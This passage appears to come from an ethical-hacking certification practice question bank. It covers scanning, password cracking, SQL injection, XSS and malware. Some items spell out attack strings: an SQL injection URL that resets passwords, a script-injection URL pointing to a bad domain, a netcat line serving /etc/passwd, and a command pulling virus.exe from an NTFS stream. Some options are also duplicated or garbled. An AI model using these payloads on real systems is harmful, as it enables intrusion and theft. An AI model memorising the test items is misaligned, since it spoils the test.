Stop work immediately and contact the authorities.

C.

Delete the pornography, say nothing, and continue security testing.

D.

Bring the discovery to the financial organization's human resource department.

Full Access
Question # 86

Which tool is used to automate SQL injections and exploit a database by forcing a given web application to connect to another database controlled by a hacker?

A.

DataThief

B.

NetCat

C.

Cain and Abel

D.

SQLInjector

Full Access
Question # 87

If an attacker's computer sends an IPID of 24333 to a zombie (Idle Scanning) computer on a closed port, what will be the response?

A.

The zombie computer will respond with an IPID of 24334.

B.

The zombie computer will respond with an IPID of 24333.

C.

The zombie computer will not send a response.

D.

The zombie computer will respond with an IPID of 24335.

Full Access
Question # 88

The traditional traceroute sends out ICMP ECHO packets with a TTL of one, and increments the TTL until the destination has been reached. By printing the gateways that generate ICMP time exceeded messages along the way, it is able to determine the path packets take to reach the destination.

The problem is that with the widespread use of firewalls on the Internet today, many of the packets that traceroute sends out end up being filtered, making it impossible to completely trace the path to the destination.

How would you overcome the Firewall restriction on ICMP ECHO packets?

A.

Firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters.

B.

Firewalls will permit inbound UDP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters.

C.

Firewalls will permit inbound UDP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters.

D.

Do not use traceroute command to determine the path packets take to reach the destination instead use the custom hacking tool JOHNTHETRACER and run with the command

E.

\> JOHNTHETRACER www.eccouncil.org -F -evade

Full Access
Question # 89

John runs a Web server, IDS and firewall on his network. Recently his Web server has been under constant hacking attacks. He looks up the IDS log files and sees no intrusion attempts but the Web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks but still the IDS alerts no intrusion whatsoever. John becomes suspicious and views the Firewall logs and he notices huge SSL connections constantly hitting his Web server. Hackers have been using the encrypted HTTPS protocol to send exploits to the Web server and that was the reason the IDS did not detect the intrusions. How would John protect his network from these types of attacks?

A.

Install a proxy server and terminate SSL at the proxy

B.

Enable the IDS to filter encrypted HTTPS traffic

C.

Install a hardware SSL "accelerator" and terminate SSL at this layer

D.

Enable the Firewall to filter encrypted HTTPS traffic

Full Access
Question # 90

Which type of antenna is used in wireless communication?

A.

Omnidirectional

B.

Parabolic

C.

Uni-directional

D.

Bi-directional

Full Access
Question # 91

Least privilege is a security concept that requires that a user is

A.

limited to those functions required to do the job.

B.

given root or administrative privileges.

C.

trusted to keep all data and access to that data under their sole control.

D.

given privileges equal to everyone else in the department.

Full Access
Question # 92

Some passwords are stored using specialized encryption algorithms known as hashes. Why is this an appropriate method?

A.

It is impossible to crack hashed user passwords unless the key used to encrypt them is obtained.

B.

If a user forgets the password, it can be easily retrieved using the hash key stored by administrators.

C.

Hashing is faster compared to more traditional encryption algorithms.

D.

Passwords stored using hashes are non-reversible, making finding the password much more difficult.

Full Access
Question # 93

A security engineer is attempting to map a company’s internal network. The engineer enters in the following NMAP commanD.

NMAP –n –sS –P0 –p 80 ***.***.**.**

What type of scan is this?

A.

Quick scan

B.

Intense scan

C.

Stealth scan

D.

Comprehensive scan

Full Access
Question # 94

In order to show improvement of security over time, what must be developed?

A.

Reports

B.

Testing tools

C.

Metrics

D.

Taxonomy of vulnerabilities

Full Access
Question # 95

You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this?

A.

There is no way to completely block tracerouting into this area

B.

Block UDP at the firewall

C.

Block TCP at the firewall

D.

Block ICMP at the firewall

Full Access
Question # 96

Which of the following describes a component of Public Key Infrastructure (PKI) where a copy of a private key is stored to provide third-party access and to facilitate recovery operations?

A.

Key registry

B.

Recovery agent

C.

Directory

D.

Key escrow

Full Access
Question # 97

WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Search engines like Google, frequently spider web pages for indexing. How will you stop web spiders from crawling certain directories on your website?

A.

Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled

B.

Place authentication on root directories that will prevent crawling from these spiders

C.

Enable SSL on the restricted directories which will block these spiders from crawling

D.

Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index

Full Access
Question # 98

Passive reconnaissance involves collecting information through which of the following?

A.

Social engineering

B.

Network traffic sniffing

C.

Man in the middle attacks

D.

Publicly accessible sources

Full Access
Question # 99

You are performing a port scan with nmap. You are in hurry and conducting the scans at the fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not an issue, what type of scan should you run to get very reliable results?

A.

Stealth scan

B.

Connect scan

C.

Fragmented packet scan

D.

XMAS scan

Full Access
Question # 100

Wayne is the senior security analyst for his company. Wayne is examining some traffic logs on a server and came across some inconsistencies. Wayne finds some IP packets from a computer purporting to be on the internal network. The packets originate from 192.168.12.35 with a TTL of 15. The server replied to this computer and received a response from 192.168.12.35 with a TTL of 21. What can Wayne infer from this traffic log?

A.

The initial traffic from 192.168.12.35 was being spoofed.

B.

The traffic from 192.168.12.25 is from a Linux computer.

C.

The TTL of 21 means that the client computer is on wireless.

D.

The client computer at 192.168.12.35 is a zombie computer.

Full Access
Question # 101

A company is using Windows Server 2003 for its Active Directory (AD). What is the most efficient way to crack the passwords for the AD users?

A.

Perform a dictionary attack.

B.

Perform a brute force attack.

C.

Perform an attack with a rainbow table.

D.

Perform a hybrid attack.

Full Access
Question # 102

SSL has been seen as the solution to a lot of common security problems. Administrator will often time make use of SSL to encrypt communications from points A to point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between point A and B?

A.

SSL is redundant if you already have IDS's in place

B.

SSL will trigger rules at regular interval and force the administrator to turn them off

C.

SSL will slow down the IDS while it is breaking the encryption to see the packet content

D.

SSL will blind the content of the packet and Intrusion Detection Systems will not be able to detect them

Full Access
Question # 103

Blane is a network security analyst for his company. From an outside IP, Blane performs an XMAS scan using Nmap. Almost every port scanned does not illicit a response. What can he infer from this kind of response?

A.

These ports are open because they do not illicit a response.

B.

He can tell that these ports are in stealth mode.

C.

If a port does not respond to an XMAS scan using NMAP, that port is closed.

D.

The scan was not performed correctly using NMAP since all ports, no matter what their state, will illicit some sort of response from an XMAS scan.

Full Access
Question # 104

Harold works for Jacobson Unlimited in the IT department as the security manager. Harold has created a security policy requiring all employees to use complex 14 character passwords. Unfortunately, the members of management do not want to have to use such long complicated passwords so they tell Harold's boss this new password policy should not apply to them. To comply with the management's wishes, the IT department creates another Windows domain and moves all the management users to that domain. This new domain has a password policy only requiring 8 characters.

Harold is concerned about having to accommodate the managers, but cannot do anything about it. Harold is also concerned about using LanManager security on his network instead of NTLM or NTLMv2, but the many legacy applications on the network prevent using the more secure NTLM and NTLMv2. Harold pulls the SAM files from the DC's on the original domain and the new domain using Pwdump6.

Harold uses the password cracking software John the Ripper to crack users' passwords to make sure they are strong enough. Harold expects that the users' passwords in the original domain will take much longer to crack than the management's passwords in the new domain. After running the software, Harold discovers that the 14 character passwords only took a short time longer to crack than the 8 character passwords.

Why did the 14 character passwords not take much longer to crack than the 8 character passwords?

A.

Harold should have used Dumpsec instead of Pwdump6

B.

Harold's dictionary file was not large enough

C.

Harold should use LC4 instead of John the Ripper

D.

LanManger hashes are broken up into two 7 character fields

Full Access
Question # 105

The network administrator at Spears Technology, Inc has configured the default gateway Cisco router's access-list as below:

You are hired to conduct security testing on their network. You successfully brute-force the SNMP community string using a SNMP crack tool. The access-list configured at the router prevents you from establishing a successful connection. You want to retrieve the Cisco configuration from the router. How would you proceed?

A.

Use the Cisco's TFTP default password to connect and download the configuration file

B.

Run a network sniffer and capture the returned traffic with the configuration file from the router

C.

Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address

D.

Send a customized SNMP set request with a spoofed source IP address in the range - 192.168.1.0

Full Access
Question # 106

A Trojan horse is a destructive program that masquerades as a benign application. The software initially appears to perform a desirable function for the user prior to installation and/or execution, but in addition to the expected function steals information or harms the system.

The challenge for an attacker is to send a convincing file attachment to the victim, which gets easily executed on the victim machine without raising any suspicion. Today's end users are quite knowledgeable about malwares and viruses. Instead of sending games and fun executables, Hackers today are quite successful in spreading the Trojans using Rogue security software.

What is Rogue security software?

A.

A flash file extension to Firefox that gets automatically installed when a victim visits rogue software disabling websites

B.

A Fake AV program that claims to rid a computer of malware, but instead installs spyware or other malware onto the computer. This kind of software is known as rogue security software.

C.

Rogue security software is based on social engineering technique in which the attackers lures victim to visit spear phishing websites

D.

This software disables firewalls and establishes reverse connecting tunnel between the victim's machine and that of the attacker

Full Access
Question # 107

Bob has been hired to do a web application security test. Bob notices that the site is dynamic and must make use of a back end database. Bob wants to see if SQL Injection would be possible. What is the first character that Bob should use to attempt breaking valid SQL request?

A.

Semi Column

B.

Double Quote

C.

Single Quote

D.

Exclamation Mark

Full Access
Question # 108

Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers.

A.

true

B.

false

Full Access
Question # 109

A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate?

A.

A buffer overflow attack has been attempted

B.

A buffer overflow attack has already occurred

C.

A firewall has been breached and this is logged

D.

An intrusion detection system has been triggered

E.

The system has crashed

Full Access
Question # 110

Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches. If these switches' ARP cache is successfully flooded, what will be the result?

A.

The switches will drop into hub mode if the ARP cache is successfully flooded.

B.

If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks.

C.

Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch.

D.

The switches will route all traffic to the broadcast address created collisions.

Full Access
Question # 111

Which of the following encryption is NOT based on block cipher?

A.

DES

B.

Blowfish

C.

AES (Rijndael)

D.

RC4

Full Access
Question # 112

Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet:

How can you protect/fix the problem of your application as shown above?

A.

Because the counter starts with 0, we would stop when the counter is less than 200

B.

Because the counter starts with 0, we would stop when the counter is more than 200

C.

Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it cannot hold any more data

D.

Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it cannot hold any more data

Full Access
Question # 113

Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces?

A.

Image Hide

B.

Snow

C.

Gif-It-Up

D.

NiceText

Full Access
Question # 114

Identify SQL injection attack from the HTTP requests shown below:

A.

http://www.myserver.c0m/search.asp?

lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00

B.

http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22

C.

http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e

D.

http://www.victim.com/example accountnumber=67891 &creditamount=999999999

Full Access
Question # 115

Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company's computer systems until they have signed the policy in acceptance of its terms. What is this document called?

A.

Information Audit Policy (IAP)

B.

Information Security Policy (ISP)

C.

Penetration Testing Policy (PTP)

D.

Company Compliance Policy (CCP)

Full Access
Question # 116

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.

http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E ">See foobar

What is this attack?

A.

Cross-site-scripting attack

B.

SQL Injection

C.

URL Traversal attack

D.

Buffer Overflow attack

Full Access
Question # 117

Which type of sniffing technique is generally referred as MiTM attack?

A.

Password Sniffing

B.

ARP Poisoning

C.

Mac Flooding

D.

DHCP Sniffing

Full Access
Question # 118

What is the correct order of steps in CEH System Hacking Cycle?

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Full Access
Question # 119

You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company's Sales database (Sales.xls) and transfer them to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How will you achieve this without raising suspicion?

A.

Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account

B.

Package the Sales.xls using Trojan wrappers and telnet them back your home computer

C.

You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques

D.

Change the extension of Sales.xls to sales.txt and upload them as attachment to your hotmail account

Full Access
Question # 120

Exhibit:

You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22. What filter will you apply?

A.

ip = 10.0.0.22

B.

ip.src == 10.0.0.22

C.

ip.equals 10.0.0.22

D.

ip.address = 10.0.0.22

Full Access
Question # 121

Tess King, the evil hacker, is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65, 536 bytes. From the information given, what type of attack is Tess King attempting to perform?

A.

Syn flood

B.

Smurf

C.

Ping of death

D.

Fraggle

Full Access
Question # 122

You have hidden a Trojan file virus.exe inside another file readme.txt using NTFS streaming.

Which command would you execute to extract the Trojan to a standalone file?

A.

c:\> type readme.txt:virus.exe > virus.exe

B.

c:\> more readme.txt | virus.exe > virus.exe

C.

c:\> cat readme.txt:virus.exe > virus.exe

D.

c:\> list redme.txt$virus.exe > virus.exe

Full Access
Question # 123

LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can compromise the user's password. How do you disable LM authentication in Windows XP?

A.

Stop the LM service in Windows XP

B.

Disable LSASS service in Windows XP

C.

Disable LM authentication in the registry

D.

Download and install LMSHUT.EXE tool from Microsoft website

Full Access
Question # 124

You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you come to know that they are enforcing strong passwords. You understand that all users are required to use passwords that are at least 8 characters in length. All passwords must also use 3 of the 4 following categories: lower case letters, capital letters, numbers and special characters.

With your existing knowledge of users, likely user account names and the possibility that they will choose the easiest passwords possible, what would be the fastest type of password cracking attack you can run against these hash values and still get results?

A.

Online Attack

B.

Dictionary Attack

C.

Brute Force Attack

D.

Hybrid Attack

Full Access
Question # 125

This kind of password cracking method uses word lists in combination with numbers and special characters:

A.

Hybrid

B.

Linear

C.

Symmetric

D.

Brute Force

Full Access
Question # 126

Which of the following statements about a zone transfer correct?(Choose three.

A.

A zone transfer is accomplished with the DNS

B.

A zone transfer is accomplished with the nslookup service

C.

A zone transfer passes all zone information that a DNS server maintains

D.

A zone transfer passes all zone information that a nslookup server maintains

E.

A zone transfer can be prevented by blocking all inbound TCP port 53 connections

F.

Zone transfers cannot occur on the Internet

Full Access
Question # 127

ARP poisoning is achieved in _____ steps

A.

1

B.

2

C.

3

D.

4

Full Access
Question # 128

Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or stored? (Choose the best answer)

A.

symmetric algorithms

B.

asymmetric algorithms

C.

hashing algorithms

D.

integrity algorithms

Full Access
Question # 129

Which DNS resource record can indicate how long any "DNS poisoning" could last?

A.

MX

B.

SOA

C.

NS

D.

TIMEOUT

Full Access
Question # 130

What does the following command in netcat do?

nc -l -u -p55555 < /etc/passwd

A.

logs the incoming connections to /etc/passwd file

B.

loads the /etc/passwd file to the UDP port 55555

C.

grabs the /etc/passwd file when connected to UDP port 55555

D.

deletes the /etc/passwd file when connected to the UDP port 55555

Full Access
Question # 131

Exhibit:

The following is an entry captured by a network IDS.You are assigned the task of analyzing this entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the attacker is attempting a buffer overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an analyst what would you conclude about the attack?

A.

The buffer overflow attack has been neutralized by the IDS

B.

The attacker is creating a directory on the compromised machine

C.

The attacker is attempting a buffer overflow attack and has succeeded

D.

The attacker is attempting an exploit that launches a command-line shell

Full Access